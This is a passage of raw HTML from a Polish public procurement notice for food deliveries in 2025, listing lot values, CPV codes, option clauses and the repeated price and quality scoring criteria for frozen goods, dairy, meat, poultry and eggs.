pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Warunki płatności.</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wymiany wadliwego produktu.</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dostawa w okresach i godzinach wskazanych przez Zamawiającego.</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Mrożonki i artykuły rybne - 32 pozycje asortymentowe. Szczegółowy opis przedmiotu zamówienia stanowi załącznik nr 1 do SWZ. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 56264,25 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15331100-8 - Warzywa świeże lub mrożone</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15221000-3 - Ryby mrożone</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1. Kupujący zastrzega sobie prawo do częściowej realizacji umowy, jednak niezrealizowana wartość umowy nie może być większa niż 35% wartości umowy., z zastrzeżeniem pkt 2 ppkt b.<br/>2. Ze względu na wystąpienie wyjątkowych okoliczności niezależnych od Zamawiającego np. stan epidemii, Kupujący zastrzega sobie prawo do zmiany ilości zamawianych mrożonek w okresie realizacji umowy, w zależności od jego rzeczywistych potrzeb, przy czym:<br/>a) wzrost zapotrzebowania nie będzie większy niż 30% wartości umowy;<br/>b) zmniejszenie zapotrzebowania nie będzie mniejsze niż 65% wartości umowy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-01-02 do 2025-12-22</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Wybór oferty najkorzystniejszej zostanie dokonany według następujących kryteriów oceny ofert:<br/><br/>KRYTERIUM 1<br/><br/>- Cena (C) - 60% - Sposób przyznawania punktów w kryterium &#34;cena&#34;:<br/>najniższa cena ofertowa<br/>C = --------------------------------------------------- x 100 x 60%<br/>cena ofertowa w ofercie ocenianej<br/><br/>W powyższym kryterium Wykonawca może uzyskać maksymalnie 60 pkt.<br/><br/>C - ogólna liczba punktów przyznana w kryterium &#34;cena&#34;<br/><br/>KRYTERIUM 2<br/><br/>Warunki płatności<br/><br/>a) termin płatności od dnia doręczenia faktury - czternaście dni - 5 pkt.<br/>b) termin płatności od dnia doręczenia faktury – dwadzieścia jeden dni - 10 pkt.<br/>c) termin płatności od dnia doręczenia faktury - trzydzieści dni - 20 pkt.<br/><br/>P - ogólna liczba punktów przyznana w kryterium warunki płatności<br/><br/>KRYTERIUM 3<br/><br/>Termin wymiany wadliwego produktu<br/><br/>a) wymiana wadliwego produktu - do dwóch godzin od zgłoszenia - 10 pkt.<br/>b) wymiana wadliwego produktu - powyżej dwóch godzin od zgłoszenia - 0 pkt.<br/><br/>T - ogólna liczba punktów przyznana w kryterium termin wymiany wadliwego produktu<br/><br/>KRYTERIUM 4<br/><br/>Dostawa w okresach i godzinach wskazanych przez Zamawiającego – określone w załączniku nr 1 do SWZ<br/><br/>a) dostawa w okresach i godzinach wskazanych przez Zamawiającego – tak - 10 pkt.<br/>b) dostawa w okresach i godzinach wskazanych przez Zamawiającego – nie - 0 pkt.<br/><br/>D - ogólna liczba punktów przyznana w kryterium dostawa w okresach i godzinach wskazanych przez Zamawiającego<br/><br/>C+P+T+D = suma przyznanych punktów w kryteriach 1 - 4.<br/><br/>Suma przyznanych punktów w kryteriach 1 - 4 będzie sumowana.<br/>W przypadku, gdy Wykonawca w formularzu ofertowym nie wskaże któregoś z kryteriów Zamawiający przyjmie, iż za dane kryterium przyjmie wartość 0 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Warunki płatności.</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wymiany wadliwego produktu.</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dostawa w okresach i godzinach wskazanych przez Zamawiającego.</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Nabiał - 32 pozycje asortymentowe. Szczegółowy opis przedmiotu zamówienia stanowi załącznik nr 1 do SWZ. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 38911,95 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15500000-3 - Produkty mleczarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1. Kupujący zastrzega sobie prawo do częściowej realizacji umowy, jednak niezrealizowana wartość umowy nie może być większa niż 35% wartości umowy, z zastrzeżeniem pkt 2 ppkt b.<br/>2. Ze względu na wystąpienie wyjątkowych okoliczności niezależnych od Zamawiającego np. stan epidemii, Kupujący zastrzega sobie prawo do zmiany ilości zamawianego nabiału w okresie realizacji umowy, w zależności od jego rzeczywistych potrzeb, przy czym:<br/>a) wzrost zapotrzebowania nie będzie większy niż 30% wartości umowy;<br/>b) zmniejszenie zapotrzebowania nie może być mniejsze niż 65% wartości umowy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-01-02 do 2025-12-22</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Wybór oferty najkorzystniejszej zostanie dokonany według następujących kryteriów oceny ofert:<br/><br/>KRYTERIUM 1<br/><br/>- Cena (C) - 60% - Sposób przyznawania punktów w kryterium &#34;cena&#34;:<br/>najniższa cena ofertowa<br/>C = --------------------------------------------------- x 100 x 60%<br/>cena ofertowa w ofercie ocenianej<br/><br/>W powyższym kryterium Wykonawca może uzyskać maksymalnie 60 pkt.<br/><br/>C - ogólna liczba punktów przyznana w kryterium &#34;cena&#34;<br/><br/>KRYTERIUM 2<br/><br/>Warunki płatności<br/><br/>a) termin płatności od dnia doręczenia faktury - czternaście dni - 5 pkt.<br/>b) termin płatności od dnia doręczenia faktury – dwadzieścia jeden dni - 10 pkt.<br/>c) termin płatności od dnia doręczenia faktury - trzydzieści dni - 20 pkt.<br/><br/>P - ogólna liczba punktów przyznana w kryterium warunki płatności<br/><br/>KRYTERIUM 3<br/><br/>Termin wymiany wadliwego produktu<br/><br/>a) wymiana wadliwego produktu - do dwóch godzin od zgłoszenia - 10 pkt.<br/>b) wymiana wadliwego produktu - powyżej dwóch godzin od zgłoszenia - 0 pkt.<br/><br/>T - ogólna liczba punktów przyznana w kryterium termin wymiany wadliwego produktu<br/><br/>KRYTERIUM 4<br/><br/>Dostawa w okresach i godzinach wskazanych przez Zamawiającego – określone w załączniku nr 1 do SWZ<br/><br/>a) dostawa w okresach i godzinach wskazanych przez Zamawiającego – tak - 10 pkt.<br/>b) dostawa w okresach i godzinach wskazanych przez Zamawiającego – nie - 0 pkt.<br/><br/>D - ogólna liczba punktów przyznana w kryterium dostawa w okresach i godzinach wskazanych przez Zamawiającego<br/><br/>C+P+T+D = suma przyznanych punktów w kryteriach 1 - 4.<br/><br/>Suma przyznanych punktów w kryteriach 1 - 4 będzie sumowana.<br/>W przypadku, gdy Wykonawca w formularzu ofertowym nie wskaże któregoś z kryteriów Zamawiający przyjmie, iż za dane kryterium przyjmie wartość 0 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Warunki płatności.</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wymiany wadliwego produktu.</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dostawa w okresach i godzinach wskazanych przez Zamawiającego.</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Mięso i wędliny - 20 pozycji asortymentowych. Szczegółowy opis przedmiotu zamówienia stanowi załącznik nr 1 do SWZ. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 49336,04 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15100000-9 - Produkty zwierzęce, mięso i produkty mięsne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1. Kupujący zastrzega sobie prawo do częściowej realizacji umowy, jednak niezrealizowana wartość umowy nie może być większa niż 35% wartości umowy, z zastrzeżeniem pkt 2 ppkt b.<br/>2. Ze względu na wystąpienie wyjątkowych okoliczności niezależnych od Zamawiającego np. stan epidemii, Kupujący zastrzega sobie prawo do zmiany ilości zamawianych mięsa i wędlin w okresie realizacji umowy, w zależności od jego rzeczywistych potrzeb, przy czym:<br/>a) wzrost zapotrzebowania nie będzie większy niż 30% wartości umowy;<br/>b) zmniejszenie zapotrzebowania nie może być mniejsze niż 65% wartości umowy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-01-02 do 2025-12-22</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Wybór oferty najkorzystniejszej zostanie dokonany według następujących kryteriów oceny ofert:<br/><br/>KRYTERIUM 1<br/><br/>- Cena (C) - 60% - Sposób przyznawania punktów w kryterium &#34;cena&#34;:<br/>najniższa cena ofertowa<br/>C = --------------------------------------------------- x 100 x 60%<br/>cena ofertowa w ofercie ocenianej<br/><br/>W powyższym kryterium Wykonawca może uzyskać maksymalnie 60 pkt.<br/><br/>C - ogólna liczba punktów przyznana w kryterium &#34;cena&#34;<br/><br/>KRYTERIUM 2<br/><br/>Warunki płatności<br/><br/>a) termin płatności od dnia doręczenia faktury - czternaście dni - 5 pkt.<br/>b) termin płatności od dnia doręczenia faktury – dwadzieścia jeden dni - 10 pkt.<br/>c) termin płatności od dnia doręczenia faktury - trzydzieści dni - 20 pkt.<br/><br/>P - ogólna liczba punktów przyznana w kryterium warunki płatności<br/><br/>KRYTERIUM 3<br/><br/>Termin wymiany wadliwego produktu<br/><br/>a) wymiana wadliwego produktu - do dwóch godzin od zgłoszenia - 10 pkt.<br/>b) wymiana wadliwego produktu - powyżej dwóch godzin od zgłoszenia - 0 pkt.<br/><br/>T - ogólna liczba punktów przyznana w kryterium termin wymiany wadliwego produktu<br/><br/>KRYTERIUM 4<br/><br/>Dostawa w okresach i godzinach wskazanych przez Zamawiającego – określone w załączniku nr 1 do SWZ<br/><br/>a) dostawa w okresach i godzinach wskazanych przez Zamawiającego – tak - 10 pkt.<br/>b) dostawa w okresach i godzinach wskazanych przez Zamawiającego – nie - 0 pkt.<br/><br/>D - ogólna liczba punktów przyznana w kryterium dostawa w okresach i godzinach wskazanych przez Zamawiającego<br/><br/>C+P+T+D = suma przyznanych punktów w kryteriach 1 - 4.<br/><br/>Suma przyznanych punktów w kryteriach 1 - 4 będzie sumowana.<br/>W przypadku, gdy Wykonawca w formularzu ofertowym nie wskaże któregoś z kryteriów Zamawiający przyjmie, iż za dane kryterium przyjmie wartość 0 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Warunki płatności.</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wymiany wadliwego produktu.</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dostawa w okresach i godzinach wskazanych przez Zamawiającego.</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Drób - 10 pozycji asortymentowych. Szczegółowy opis przedmiotu zamówienia stanowi załącznik nr 1 do SWZ. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 35787,15 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15112000-6 - Drób</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15112120-3 - Indyki</p> <p class="mb-0">15112130-6 - Kurczęta</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1. Kupujący zastrzega sobie prawo do częściowej realizacji umowy, jednak niezrealizowana wartość umowy nie może być większa niż 35% wartości umowy, z zastrzeżeniem pkt 2 ppkt b.<br/>2. Ze względu na wystąpienie wyjątkowych okoliczności niezależnych od Zamawiającego np. stan epidemii, Kupujący zastrzega sobie prawo do zmiany ilość zamawianego drobiu w okresie realizacji umowy, w zależności od jego rzeczywistych potrzeb, przy czym:<br/>a) wzrost zapotrzebowania nie będzie większy niż 30% wartości umowy;<br/>b) zmniejszenie zapotrzebowania nie może być mniejsze niż 65% wartości umowy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-01-02 do 2025-12-22</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Wybór oferty najkorzystniejszej zostanie dokonany według następujących kryteriów oceny ofert:<br/><br/>KRYTERIUM 1<br/><br/>- Cena (C) - 60% - Sposób przyznawania punktów w kryterium &#34;cena&#34;:<br/>najniższa cena ofertowa<br/>C = --------------------------------------------------- x 100 x 60%<br/>cena ofertowa w ofercie ocenianej<br/><br/>W powyższym kryterium Wykonawca może uzyskać maksymalnie 60 pkt.<br/><br/>C - ogólna liczba punktów przyznana w kryterium &#34;cena&#34;<br/><br/>KRYTERIUM 2<br/><br/>Warunki płatności<br/><br/>a) termin płatności od dnia doręczenia faktury - czternaście dni - 5 pkt.<br/>b) termin płatności od dnia doręczenia faktury – dwadzieścia jeden dni - 10 pkt.<br/>c) termin płatności od dnia doręczenia faktury - trzydzieści dni - 20 pkt.<br/><br/>P - ogólna liczba punktów przyznana w kryterium warunki płatności<br/><br/>KRYTERIUM 3<br/><br/>Termin wymiany wadliwego produktu<br/><br/>a) wymiana wadliwego produktu - do dwóch godzin od zgłoszenia - 10 pkt.<br/>b) wymiana wadliwego produktu - powyżej dwóch godzin od zgłoszenia - 0 pkt.<br/><br/>T - ogólna liczba punktów przyznana w kryterium termin wymiany wadliwego produktu<br/><br/>KRYTERIUM 4<br/><br/>Dostawa w okresach i godzinach wskazanych przez Zamawiającego – określone w załączniku nr 1 do SWZ<br/><br/>a) dostawa w okresach i godzinach wskazanych przez Zamawiającego – tak - 10 pkt.<br/>b) dostawa w okresach i godzinach wskazanych przez Zamawiającego – nie - 0 pkt.<br/><br/>D - ogólna liczba punktów przyznana w kryterium dostawa w okresach i godzinach wskazanych przez Zamawiającego<br/><br/>C+P+T+D = suma przyznanych punktów w kryteriach 1 - 4.<br/><br/>Suma przyznanych punktów w kryteriach 1 - 4 będzie sumowana.<br/>W przypadku, gdy Wykonawca w formularzu ofertowym nie wskaże któregoś z kryteriów Zamawiający przyjmie, iż za dane kryterium przyjmie wartość 0 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Warunki płatności.</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wymiany wadliwego produktu.</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dostawa w okresach i godzinach wskazanych przez Zamawiającego.</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Jaja - 1 pozycja asortymentowa. Szczegółowy opis przedmiotu zamówienia stanowi załącznik nr 1 do SWZ. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 5670,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">03142500-3 - Jaja</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1. Kupujący zastrzega sobie prawo do częściowej realizacji umowy, jednak niezrealizowana wartość umowy nie może być większa niż 35% wartości umowy, z zastrzeżeniem pk 2 ppkt b.<br/>2. Ze względu na wystąpienie wyjątkowych okoliczności niezależnych od Zamawiającego np. stan epidemii, Kupujący zastrzega sobie prawo do zmiany ilości zamawianych jaj w okresie realizacji umowy, w zależności od jego rzeczywistych potrzeb, przy czym:<br/>a) wzrost zapotrzebowania nie będzie większy niż 30% wartości umowy;<br/>b) zmniejszenie zapotrzebowania nie może być mniejsze niż 65% wartości umowy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-01-02 do 2025-12-22</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Wybór oferty najkorzystniejszej zostanie dokonany według następujących kryteriów oceny ofert:<br/><br/>KRYTERIUM 1<br/><br/>- Cena (C) - 60% - Sposób przyznawania punktów w kryterium &#34;cena&#34;:<br/>najniższa cena ofertowa<br/>C = --------------------------------------------------- x 100 x 60%<br/>cena ofertowa w ofercie ocenianej<br/><br/>W powyższym kryterium Wykonawca może uzyskać maksymalnie 60 pkt.<br/><br/>C - ogólna liczba punktów przyznana w kryterium &#34;cena&#34;<br/><br/>KRYTERIUM 2<br/><br/>Warunki płatności<br/><br/>a) termin płatności od dnia doręczenia faktury - czternaście dni - 5 pkt.<br/>b) termin płatności od dnia doręczenia faktury – dwadzieścia jeden dni - 10 pkt.<br/>c) termin płatności od dnia doręczenia faktury - trzydzieści dni - 20 pkt.<br/><br/>P - ogólna liczba punktów przyznana w kryterium warunki płatności<br/><br/>KRYTERIUM 3<br/><br/>Termin wymiany wadliwego produktu<br/><br/>a) wymiana wadliwego produktu - do dwóch godzin od zgłoszenia - 10 pkt.<br/>b) wymiana wadliwego produktu - powyżej dwóch godzin od zgłoszenia - 0 pkt.<br/><br/>T - ogólna liczba punktów przyznana w kryterium termin wymiany wadliwego produktu<br/><br/>KRYTERIUM 4<br/><br/>Dostawa w okresach i godzinach wskazanych przez Zamawiającego – określone w załączniku nr 1 do SWZ<br/><br/>a) dostawa w okresach i godzinach wskazanych przez Zamawiającego – tak - 10 pkt.<br/>b) dostawa w okresach i godzinach wskazanych przez Zamawiającego – nie - 0 pkt.<br/><br/>D - ogólna liczba punktów przyznana w kryterium dostawa w okresach i godzinach wskazanych przez Zamawiającego<br/><br/>C+P+T+D = suma przyznanych punktów w kryteriach 1 - 4.<br/><br/>Suma przyznanych punktów w kryteriach 1 - 4 będzie sumowana.<br/>W przypadku, gdy Wykonawca w formularzu ofertowym nie wskaże któregoś z kryteriów Zamawiający przyjmie, iż za dane kryterium przyjmie wartość 0 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Warunki płatności.</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wymiany wadliwego produktu.</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy 